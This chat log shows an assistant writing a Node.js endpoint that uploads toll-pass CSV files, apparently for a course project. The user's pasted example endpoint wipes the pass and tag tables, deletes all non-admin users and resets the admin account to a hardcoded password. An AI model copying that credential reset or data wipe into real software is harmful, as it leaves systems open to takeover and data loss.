USER 
-------------------------------------------------
4. /admin/addpasses: Υποστηρίζει τη μέθοδο POST και προβαίνει σε ενημέρωση των 
γεγονότων διέλευσης, καθώς και όλων των πινάκων/συλλογών που διατηρούν δεδομένα 
που εξαρτώνται από τις διελεύσεις (πχ: tags, εφόσον υπάρχουν τέτοιοι πίνακες ή συλλογές), 
με προσθήκη των διελεύσεων που περιέχονται στο αρχείο csv που μεταφέρεται ως 
content type: multipart/form-data και mime type: 'text/csv'. Ο 
μορφότυπος του αρχείου (ονόματα πεδίων) είναι υποχρεωτικά αυτός που δίνεται στο 
αρχείο-παράδειγμα με όνομα passes-sample.csv το οποίο υπάρχει για κατέβασμα στο 
φάκελο "Ενδεικτικό csv αρχείο διελεύσεων" στο helios. 


/**
 * @swagger
 * /api/admin/resetpasses:
 *   post:
 *     summary: Reset all pass events and dependent data
 *     responses:
 *       200:
 *         description: "Successful reset"
 *         content:
 *           application/json:
 *             schema:
 *               type: object
 *               properties:
 *                 status:
 *                   type: string
 *                   example: "OK"
 *       500:
 *         description: "Internal server error"
 *         content:
 *           application/json:
 *             schema:
 *               type: object
 *               properties:
 *                 status:
 *                   type: string
 *                   example: "failed"
 *                 info:
 *                   type: string
 *                   example: "reason"
 */

app.post('/api/admin/resetpasses', (req, res) => {
    const resetQueries = [
        'TRUNCATE TABLE pass',
        'TRUNCATE TABLE tag',
        'DELETE FROM user WHERE role != "admin"',
        'UPDATE user SET password = "freepasses4all", username = "admin" WHERE role = "admin"'
    ];
Αυτό ειναι παραδειγμα αλλου endpoint για να σε βοηθησει

CHATGPT AI
-------------------------------------------------
To implement the `/admin/addpasses` endpoint, the system must support `POST` requests that process and store toll passage data from a CSV file transmitted with a `multipart/form-data` content type. This requires handling file uploads, parsing CSV data, and updating all dependent database tables accordingly.

### Implementation Considerations:

1. **File Handling and Parsing**  
   - The server must accept a CSV file with a predefined schema (as specified in `passes-sample.csv`).
   - Parsing mechanisms should validate field formats and handle potential errors, such as missing or malformed entries.

2. **Database Transactions**  
   - The `pass` table should be updated with new entries extracted from the CSV.
   - If applicable, related tables (e.g., `tag`) should be modified to reflect newly recorded toll crossings.

3. **Data Integrity and Concurrency**  
   - Transactions should ensure atomicity to prevent partial updates in the event of a failure.
   - Duplicate entry checks should be in place to avoid redundant records.

4. **Security and Access Control**  
   - Only authorized users (e.g., administrators) should be permitted to execute this operation.
   - Input sanitization is essential to mitigate SQL injection risks.

### Example Implementation (Node.js with Express and Multer)
The following code provides a starting point for handling CSV uploads:

```javascript
const express = require('express');
const multer = require('multer');
const csvParser = require('csv-parser');
const fs = require('fs');
const mysql = require('mysql2/promise');

const router = express.Router();
const upload = multer({ dest: 'uploads/' });

router.post('/api/admin/addpasses', upload.single('file'), async (req, res) => {
    if (!req.file) {
        return res.status(400).json({ status: 'failed', info: 'No file uploaded' });
    }

    const connection = await mysql.createConnection({ /* DB credentials */ });
    const filePath = req.file.path;
    const passData = [];

    try {
        const fileStream = fs.createReadStream(filePath);
        fileStream.pipe(csvParser())
            .on('data', (row) => {
                passData.push(row);
            })
            .on('end', async () => {
                await connection.beginTransaction();
                try {
                    for (const pass of passData) {
                        await connection.execute(
                            `INSERT INTO pass (toll_pk, tag_pk, vehicle_type, amount, date_occurred, date_received)
                             VALUES (?, ?, ?, ?, ?, ?)`,
                            [pass.toll_pk, pass.tag_pk, pass.vehicle_type, pass.amount, pass.date_occurred, pass.date_received]
                        );
                    }
                    await connection.commit();
                    res.json({ status: 'OK' });
                } catch (error) {
                    await connection.rollback();
                    res.status(500).json({ status: 'failed', info: error.message });
                } finally {
                    connection.end();
                    fs.unlinkSync(filePath);
                }
            });
    } catch (error) {
        res.status(500).json({ status: 'failed', info: error.message });
    }
});

module.exports = router;
```

This implementation:
- **Handles file uploads** using `multer`.
- **Parses CSV data** using `csv-parser`.
- **Inserts data into the `pass` table** while ensuring transaction safety.
- **Performs error handling and cleanup** by rolling back transactions on failure.

Would you like to include additional validation logic, such as checking for toll booth existence (`toll_pk`) before insertion?